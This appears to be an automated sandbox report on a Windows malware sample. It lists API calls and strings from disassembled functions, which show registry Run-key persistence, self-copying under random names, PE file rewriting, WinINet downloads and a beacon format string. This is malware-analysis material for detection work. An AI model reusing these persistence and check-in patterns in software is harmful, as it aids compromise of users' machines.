                  • String ID: "URL"
                  • API String ID: 2525500382-1734660058
                  • Opcode ID: dde5973fb88290fc179560dd033cd143229de4e8b937af87662ad62248fcd5ae
                  • Instruction ID: a1d8355846c3e17605cb56d648b2f311708773d78851072204e2f77cd01d539a
                  • Opcode Fuzzy Hash: dde5973fb88290fc179560dd033cd143229de4e8b937af87662ad62248fcd5ae
                  • Instruction Fuzzy Hash: E9F0A77650011997CF00AF64CC00ED637E9BB84348F0444B7E904E7240D974D9058F54
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 004097ED
                  • SysAllocString.OLEAUT32(?), ref: 004097FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: AllocString
                  • String ID: "domain"
                  • API String ID: 2525500382-3540696003
                  • Opcode ID: 8e4162beac9bb0746109323da30f0d67e223eba2bd2c583220c59dcd4726db76
                  • Instruction ID: 2ab7b57618223888890007651f958d72a6f850cfddda49e7e7e9e9b765f43e97
                  • Opcode Fuzzy Hash: 8e4162beac9bb0746109323da30f0d67e223eba2bd2c583220c59dcd4726db76
                  • Instruction Fuzzy Hash: AEF0A776500119ABCF00AF64CC04ED677E8BB84308F1444A7F908E7240EA7499058F50
                  APIs
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC44
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC72
                  • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                  • FindClose.KERNEL32(00000000), ref: 0040AC0F
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: FindOpen$CloseFileFirst
                  • String ID:
                  • API String ID: 3155378417-0
                  • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                  • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                  • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                  • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                    • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                  • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                  • Sleep.KERNEL32(00002710), ref: 0040B3F7
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                  • ExitProcess.KERNEL32 ref: 0040B44D
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC44
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC72
                  • GetLastError.KERNEL32(00000004), ref: 0040B48D
                  • GetLastError.KERNEL32(00000004), ref: 0040B49A
                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                  • GetLastError.KERNEL32(00000004), ref: 0040B500
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                  • API String ID: 3692109554-477663111
                  • Opcode ID: 5dcf4e451e470d8890dd4ade5d76f00a0e3579805ce90c0beb9d6229d45a20ee
                  • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                  • Opcode Fuzzy Hash: 5dcf4e451e470d8890dd4ade5d76f00a0e3579805ce90c0beb9d6229d45a20ee
                  • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF
                  APIs
                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004075FC
                  • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                  • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407660
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040767F
                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00407691
                  • ReadFile.KERNEL32(?,?,00000040,?,00000000), ref: 004076A1
                  • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076AF
                  • ReadFile.KERNEL32(?,?,000000F8,?,00000000), ref: 004076C5
                  • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076EF
                  • WriteFile.KERNEL32(?,?,000000F8,?,00000000), ref: 00407705
                  • CloseHandle.KERNEL32(?), ref: 00407714
                  • CloseHandle.KERNEL32(?), ref: 00407719
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocateProcessSize
                  • String ID:
                  • API String ID: 2296163861-0
                  • Opcode ID: 31584969f0d8c824f09f907cde1219f0f1ba332f2ad8a455396c3ebe95af8835
                  • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                  • Opcode Fuzzy Hash: 31584969f0d8c824f09f907cde1219f0f1ba332f2ad8a455396c3ebe95af8835
                  • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64
                  APIs
                  • InternetOpenUrlW.WININET(?,?,?,00000000,04400000,00000000), ref: 00409CCB
                  • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,00000000,?,?,00000000,00000000), ref: 00409CF4
                  • RtlAllocateHeap.NTDLL(00000000,?,00406FE2), ref: 00409CF7
                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409D6E
                  • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,00000000,?,?,00000000,00000000), ref: 00409D80
                  • RtlAllocateHeap.NTDLL(00000000,?,00406FE2), ref: 00409D83
                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,00000000,?,?,00000000,00000000), ref: 00409DE3
                  • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,00000000,?,?,00000000,00000000), ref: 00409DE6
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Heap$Process$AllocateInternet$FileFreeOpenRead
                  • String ID:
                  • API String ID: 1606433043-0
                  • Opcode ID: ee70a092113cb82a66864aea72d7e922ec5dd955c6bc6ddcba87379bbd99d211
                  • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                  • Opcode Fuzzy Hash: ee70a092113cb82a66864aea72d7e922ec5dd955c6bc6ddcba87379bbd99d211
                  • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: CountTick
                  • String ID: .html$0$From: $Page generated at: $Via: $^key=$^nocrypt
                  • API String ID: 536389180-3563684505
                  • Opcode ID: 4fe78ffc506b949ed18c1779bc78ee1e5113d94c3b4afea5b4e77ea3237f9061
                  • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                  • Opcode Fuzzy Hash: 4fe78ffc506b949ed18c1779bc78ee1e5113d94c3b4afea5b4e77ea3237f9061
                  • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59
                  APIs
                  • Sleep.KERNEL32(00002710,?,00000000), ref: 0040A7A3
                  • Sleep.KERNEL32(0000EA60,?,?,00000000), ref: 0040A899
                  • Sleep.KERNELBASE(00002710,?,?,?,?,?,?,00000000), ref: 0040A8CC
                  • GetProcessHeap.KERNEL32(00000000,Iy@,?,?,?,?,?,?,00000000), ref: 0040A8E5
                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 0040A8EC
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                  • String ID: 0$Iy@$Iy@$confirm^rev=%s^code=%s^param=%s^os=%s
                  • API String ID: 3100629401-635595758
                  • Opcode ID: e21f1483a08a9e9c02d775bbc8488e60abd853dd32556b7f820d3b87ce5a4a2c
                  • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                  • Opcode Fuzzy Hash: e21f1483a08a9e9c02d775bbc8488e60abd853dd32556b7f820d3b87ce5a4a2c
                  • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,?,UniqueNum), ref: 0040784D
                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00407880
                  • GetTickCount.KERNEL32 ref: 00407888
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: File$ChangeCloseCountCreateFindModuleNameNotificationTickTime
                  • String ID: UniqueNum
                  • API String ID: 341939912-3816303966
                  • Opcode ID: 4a1b5587f638b287927dc25e9214ab530ecb830b1a0472cd12236f6b46158c61
                  • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                  • Opcode Fuzzy Hash: 4a1b5587f638b287927dc25e9214ab530ecb830b1a0472cd12236f6b46158c61
                  • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB
                  APIs
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                  • ReadFile.KERNEL32(?,00000064,00000000,00000000), ref: 00407E74
                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                    • Part of subcall function 00407CD7: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: File$CreateModuleNamePointerRead
                  • String ID: UniqueNum$d$x
                  • API String ID: 1528952607-727609663
                  • Opcode ID: e781d678688d42d7516b702b2ceb6c7207e197dfbc75e9fa72b18e73f6410cb1
                  • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                  • Opcode Fuzzy Hash: e781d678688d42d7516b702b2ceb6c7207e197dfbc75e9fa72b18e73f6410cb1
                  • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE
                  APIs
                  • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC44
                  • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC72
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(?,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069ED
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Open$CloseQueryValue
                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                  • API String ID: 3546245721-4228964922
                  • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                  • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                  • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                  • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779
                  APIs
                  • GetCommandLineW.KERNEL32 ref: 0040AB0A
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000820), ref: 0040AB44
                  • CharLowerW.USER32(?), ref: 0040AB57
                  • CharLowerW.USER32(?), ref: 0040AB60
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: CharLower$CommandFileLineModuleName
                  • String ID: /nomove
                  • API String ID: 1338073227-1111986840
                  • Opcode ID: f64901d43a542e62caf56568754323496182aa7e159d48bf7f08474787536f84
                  • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                  • Opcode Fuzzy Hash: f64901d43a542e62caf56568754323496182aa7e159d48bf7f08474787536f84
                  • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                  • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                  • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: File$CreateCurrentDirectoryModuleName
                  • String ID: \merocz.xc6
                  • API String ID: 3818821825-505599559
                  • Opcode ID: 958115370d9fa0fe1f61a9c021a4e84f793f7b6e6975f338f53fe808b3c86dcf
                  • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                  • Opcode Fuzzy Hash: 958115370d9fa0fe1f61a9c021a4e84f793f7b6e6975f338f53fe808b3c86dcf
                  • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,74DF0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                  • GetLastError.KERNEL32(00000004), ref: 004077A9
                    • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004075FC
                    • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                  • String ID:
                  • API String ID: 1536607067-0
                  • Opcode ID: b2ecad4675651e133223641967df2b0444bb0b5a8c67c8da0a44246ab1e465c2
                  • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                  • Opcode Fuzzy Hash: b2ecad4675651e133223641967df2b0444bb0b5a8c67c8da0a44246ab1e465c2
                  • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B
                  APIs
                  • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069E3
                  • RegCloseKey.KERNELBASE(?,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069ED
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: CloseQueryValue
                  • String ID: w,@
                  • API String ID: 3356406503-3776089593
                  • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                  • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                  • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                  • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14
                  APIs
                  • _memset.LIBCMT ref: 00407800
                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0040781B
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: CreateProcess_memset
                  • String ID:
                  • API String ID: 1177741608-0
                  • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                  • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                  • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                  • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5
                  APIs
                  • InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406D2C
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmpDownload File
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                  Similarity
                  • API ID: Internet$AttemptConnectOpen
                  • String ID:
                  • API String ID: 2984283330-0
                  • Opcode ID: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                  • Instruction ID: 3045e06cac02f36cd47ad2bbc893350a3e6c997d3593ce6e368a9b0161d3b649
                  • Opcode Fuzzy Hash: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                  • Instruction Fuzzy Hash: 04D05E713171312BE7345B763E48ACB2E4CDF02A61701043AF406D8090D6348851C6E8
                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,00020002), ref: 00403A09
                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                  • RtlAllocateHeap.NTDLL(00000008,00000C0C), ref: 00403A55
                  • StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                  • StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
